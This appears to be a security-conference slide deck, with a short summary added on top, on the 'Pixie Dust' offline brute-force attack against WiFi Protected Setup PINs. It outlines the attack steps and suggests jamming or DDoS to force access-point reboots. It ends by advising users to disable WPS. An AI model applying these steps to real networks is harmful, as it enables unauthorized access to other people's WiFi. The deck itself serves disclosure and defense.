This document discusses offline brute force attacks on WiFi Protected Setup (WPS). It describes how WPS uses an 8-digit PIN code that can be cracked through brute force attacks. It also details the "Pixie Dust" attack method, which recovers the pseudorandom number generator state used by WPS to determine the encryption keys, allowing offline cracking of the PIN and recovery of the WiFi passphrase. The document warns that many access points still have vulnerable WPS implementations and recommends disabling WPS to prevent such attacks.

1. Offline bruteforce attack on
WiFi Protected Setup
Dominique Bongard
Founder
0xcite, Switzerland
@reversity

2. § Protocol aiming at easily connecting to protected WiFi networks
§ Two main modes: Push-Button and 8 digit PIN code
§ Gives the WPA passphrase to stations providing the right PIN
§ Poor design and implementation

5. Stefan Viehböck

6. Stefan Viehböck

7. § Brute force each half of the PIN
§ Maximum 10‘000 tries + 1‘000 tries
§ No limitation on number of tries in many AP
§ Takes a few hours (depends on the AP)
§ Largely slowed down in new devices (lock-out)
§ Many AP still sold with WPS PIN activated

9. STA
Nonce
E-Hash1 E-Hash2 HMAC
AES(HMAC(PIN1),E-S1) AES(HMAC(PIN2),E-S2)

10. § If we can guess E-S1 and E-S2, we can the
brute force PIN1 and PIN2 offline!
§ Pixie dust attack!

11. § Usually with pseudo-random generators (PRNG)
§ Often insecure PRNG
§ No or low entropy
§ Small state (32 bits)
§ Can the PRNG state be recovered ?

12. int rand_r( unsigned int *seed ) {
unsigned int s=*seed;
unsigned int uret;
s = (s * 1103515245) + 12345; // permutate seed
uret = s & 0xffe00000;// Only use top 11 bits
s = (s * 1103515245) + 12345; // permutate seed
uret += (s & 0xfffc0000) >> 11;// Only use top 14 bits
s = (s * 1103515245) + 12345; // permutate seed
uret += (s & 0xfe000000) >> (11+14);// Only use top 7 bits
retval = (int)(uret & RAND_MAX);
*seed = s;
return retval; }

13. AP Nonce Description PK

14. § Linear Congruential Generator
§ 32 bits state
§ No external entropy
§ E-S1 and E-S2 generated right after the Nonce

15. § Do the WPS protocol up to message M3
§ Get the Nonce from M1
§ Bruteforce the state of the PRNG
§ Compute E-S1 and E-S2 from the state
§ Decrypt E-Hash1 and E-Hash2
§ Bruteforce Pin1 and Pin2
§ Do the full WPS protocol and get the passphrase

16. § Linear Feedback Shift Register (LFSR)
§ Broken
§ Doesn‘t matter the keys are always NULL !!

17. § Some AP have the same state at each boot
§ Make a list of common states after reboot
§ Attack the AP right after boot

18. § Trigger the breakers
§ DDOS the AP
§ Jam the signal until the target reboots the AP

19. § Looks okay
§ Uses /dev/random
§ Found in Atheros SDK
§ But you never know
§ Several papers attack the entropy of the linux
PRNG in embedded systems

20. § It‘s complicated
§ Many of the implementations are the reference
code for the chipset
§ Only the GUI is reskinned
§ Therefore many brands are affected
§ Many vendors use different chipset
§ Even for the same model number

21. § Disable WPS now !
§ Reverse engineers: Check other AP for bad PRNG
§ Cryptographers: Check if good PRNG are okay